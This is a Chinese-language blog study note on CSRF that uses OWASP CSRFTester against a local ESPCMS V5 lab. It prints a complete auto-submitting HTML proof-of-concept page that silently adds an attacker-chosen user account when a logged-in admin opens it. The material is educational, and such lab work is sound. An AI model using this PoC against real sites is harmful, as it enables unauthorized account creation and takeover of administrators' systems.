[理论-学习]Web安全-CSRF-基础03

最新推荐文章于 2024-05-03 17:06:18 发布
最新推荐文章于 2024-05-03 17:06:18 发布
阅读量537 收藏 12
点赞数 5
分类专栏: # CSRF / SSRF 文章标签: csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40929683/article/details/120241909
版权

声明:

由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。

笔记内容来源于各类网课

环境:ESPCMSV5(本地环境),CSRFTester

一、概述

使用CSRFTester工具生成POC,触发CSRF。

二、CSRF利用

首先打开CSRFTester,它会监听本地8008端口。我们配置浏览器代理为本地8008端口。

我们登陆系统后台,进入会员管理页面。

我们添加用户。

添加用户名,登录密码,确认密码,邮箱。

添加前打开CSRFTester的Start Recoding,抓取提交的表单。

抓取到提交的表单。

修改一下参数,参数为我们需要的新添加的用户信息。

我们将html保存到桌面即可。

其中的代码如下,也就是一个恶意页面,里面进行表单数据提交,触发CSRF漏洞。 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "22","21","16","19","778" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 5;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="GET" name="form0" action="http://127.0.0.1:8010/adminsoft/index.php?archive=management&action=load&digheight=150">
<input type="hidden" name="name" value="value"/> 
</form>
<form method="POST" name="form1" action="http://127.0.0.1:8010/adminsoft/index.php?archive=membermain&action=membersave">
<input type="hidden" name="inputclass" value="add"/>
<input type="hidden" name="lng" value="cn"/>
<input type="hidden" name="tab" value="true"/>
<input type="hidden" name="username" value="tom"/>
<input type="hidden" name="password" value="hitom"/>
<input type="hidden" name="password2" value="hitom"/>
<input type="hidden" name="email" value="2@hack.com"/>
<input type="hidden" name="question" value=""/>
<input type="hidden" name="answer" value=""/>
<input type="hidden" name="mcid" value="1"/>
<input type="hidden" name="alias" value=""/>
<input type="hidden" name="sex" value="1"/>
<input type="hidden" name="tel" value=""/>
<input type="hidden" name="mobile" value=""/>
<input type="hidden" name="birthday" value=""/>
<input type="hidden" name="address" value=""/>
<input type="hidden" name="zipcode" value=""/>
<input type="hidden" name="msn" value=""/>
<!-- 不需要使用的删除或注释 -->
<!-- <input type="hidden" name="qq" value=""/>
</form>
<form method="GET" name="form2" action="http://127.0.0.1:8010/adminsoft/index.php?archive=membermain&action=memberlist&mcid=1&isclass=&country=&province=&city=&district=&limitkey=&limitclass=&countnum=2&freshid=0.11032087375676158">
<input type="hidden" name="name" value="value"/> 
</form>
<form method="POST" name="form3" action="http://127.0.0.1:8010/adminsoft/index.php?archive=membermain&action=memberlist&mcid=1&isclass=&country=&province=&city=&district=&limitkey=&limitclass=">
<input type="hidden" name="MinPageid" value="0"/>
<input type="hidden" name="page_id" value="0"/>
<input type="hidden" name="MaxPerPage" value="12"/>
</form>
<form method="GET" name="form4" action="http://detectportal.firefox.com:80/success.txt">
<input type="hidden" name="name" value="value"/> 
</form> -->

</body>
</html>

使用刚才登陆管理员的浏览器打开这个index.html就触发了CSRF漏洞。

系统触发CSRF漏洞,成功添加用户tom。

3hex___________
关注
  • 5
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
next-csrf:Next.js的CSRF缓解
05-14
next-csrf Next.js的CSRF缓解。 特征 next-csrf实现的缓解模式: 使用 (另请 ) 安装 含纱线: yarn add next-csrf 使用npm: npm i next-csrf --save 用法 设置: // file: lib/csrf.js import { nextCsrf } from "next-csrf" ; const options = { secret : process . env . CSRF_SECRET // Long, randomly-generated, unique, and unpredictable value } export const { csrf , csrfToken } = nextCsrf ( options ) ; 初始化nextCsrf ,它将返回中间件和有效的签名CSRF令牌。
基于复杂方案OWSAP CsrfGuard的CSRF安全解决方案(适配nginx + DWR)
weixin_34010949的博客
05-21 109
2019独角兽企业重金招聘Python工程师标准>>> ...
OWASP TOP10
m0_62207482的博客
02-13 1594
alert(1)
万字讲解9种Web应用攻击与防护安全。XSS、CSRF、SQL注入等是如何实现的
热门推荐
LoveSummer
03-31 6万+
XSS :Cross Site Scripting,为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中 Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在一开始的时候,这种攻击的演示案例是跨域的,所以叫"跨站脚本"。但是发展到今天,由于JavaScript的强大功能基于网站前端应用的复杂化,是否跨域已经不再重要。
jq 给div设置宽_jQuery 获取与设置div的宽高
weixin_39700220的博客
12-21 3126
jQuery获取与设置div的宽高的方法有两种:1. 使用尺寸函数2.使用css方法获取宽高1. 尺寸函数:height() 获取高度,width() 获取宽度2. css获取div宽高:css("height")获取高度,css("width")获取宽度区别:尺寸函数获取的值为整型,而css获取的值为带px的字符串$(".divClass").click(function() {// 使用wi...
安全性测试--CSRF攻击
02-26
CSRF(Cross-siterequestforgery),...CSRF这种攻击方式在2000年已经被国外的安全人员提出,但在国内,直到06年才开始被关注,08年,国内外的多个大型**和交互网站分别爆出CSRF漏洞,如:NYTimes.com(纽约时报)、M
WEB安全基础-合集篇
10-23
WEB安全基础—合集篇,包含基础SQL注入、文件上传、XSS、CSRF、文件包含、逻辑漏洞等。适合新手上手参考学习,通过本文档,可以快速了解渗透测试。
vue-resource post数据时碰到Django csrf问题的解决
10-15
主要介绍了vue-resource post数据时碰到Django csrf问题的解决,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
OWASP(CsrfGuard)源码解析02----CsrfGuardServletContextListener分析
一直打铁
01-15 426
CsrfGuardServletContextListener分析一、整体框架介绍二、CsrfGuardServletContextListener 分析2.1 contextInitialized 解析三、小结 一、整体框架介绍 首先我们看一下 csrfguard 这个jar 的整体框架 如下图, 里面主要 是分 config 配置, Filter , listener ,action 和 resources 下面的 默认的 csrfguard.properties 和 csrfguard.js 文件
前端安全防护实战:XSS、CSRF防御与同源策略详解(react 案例)
qq_35374791的博客
05-03 736
前端安全防护实战中,主要涉及三个方面:XSS (Cross-Site Scripting) 攻击的防御、CSRF (Cross-Site Request Forgery) 攻击的防御,以及浏览器的同源策略
飞歌G6IV刷机包,恢复出厂解决车机问题
05-05
飞歌G6IV刷机包,恢复出厂解决车机问题
人工智能大作业-无人机图像目标检测.zip
05-05
无人机最强算法源码,易于部署和学习交流使用
node-v10.9.0-linux-s390x.tar.xz
05-05
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Telecord机器人,无electron依赖。.zip
05-05
无人机最强源码,无人机算法,易于部署和学习交流使用
中国统计NJ面板数据-(更新至2022年)林业有害生物防治情况.xls
最新发布
05-06
数据来源:中国统计NJ-2023版
无人机共享平台小程序.zip
05-05
无人机最强算法源码,易于部署和学习交流使用
node-v10.14.2-linux-ppc64le.tar.xz
05-05
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
en-PP-OCRv3-det.onnx
05-05
PP-OCR det
毫无特色的 QQ 机器人.zip
05-05
无人机最强算法源码,易于部署和学习交流使用
csrf-token
09-16
csrf-token是一种用于防止CSRF攻击的安全机制。在客户端向后端发送请求时,后端会生成一个csrf-token并将其存储在cookie中。同时,后端会在表单中添加一个隐藏字段,该字段的值也是csrf-token。当用户提交表单时,会...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值